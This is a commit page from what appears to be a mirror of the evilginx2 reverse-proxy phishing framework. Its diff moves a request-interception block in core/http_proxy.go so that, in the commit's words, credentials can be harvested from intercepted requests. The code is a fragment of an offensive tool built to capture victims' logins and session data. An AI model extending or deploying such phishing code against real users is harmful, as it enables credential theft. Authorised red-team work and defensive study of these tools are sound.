1berry/evilginx2
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

credentials can now be harvested from intercepted requests

Browse Source
This commit is contained in:
Kuba Gretzky 2024-04-02 00:27:42 +02:00
parent f346c42048
commit e3bef9433c
1 changed files with 13 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

25
core/http_proxy.go
View File

@ -603,18 +603,6 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
}
}
// check if request should be intercepted
if pl != nil {
if r_host, ok := p.replaceHostWithOriginal(req.Host); ok {
for _, ic := range pl.intercept {
//log.Debug("ic.domain:%s r_host:%s", ic.domain, r_host)
//log.Debug("ic.path:%s path:%s", ic.path, req.URL.Path)
if ic.domain == r_host && ic.path.MatchString(req.URL.Path) {
return p.interceptRequest(req, ic.http_status, ic.body, ic.mime)
}
}
}
}
// replace "Host" header
if r_host, ok := p.replaceHostWithOriginal(req.Host); ok {
req.Host = r_host
@ -862,6 +850,19 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
}
}
// check if request should be intercepted
if pl != nil {
if r_host, ok := p.replaceHostWithOriginal(req.Host); ok {
for _, ic := range pl.intercept {
//log.Debug("ic.domain:%s r_host:%s", ic.domain, r_host)
//log.Debug("ic.path:%s path:%s", ic.path, req.URL.Path)
if ic.domain == r_host && ic.path.MatchString(req.URL.Path) {
return p.interceptRequest(req, ic.http_status, ic.body, ic.mime)
}
}
}
}
if pl != nil && len(pl.authUrls) > 0 && ps.SessionId != "" {
s, ok := p.sessions[ps.SessionId]
if ok && !s.IsDone {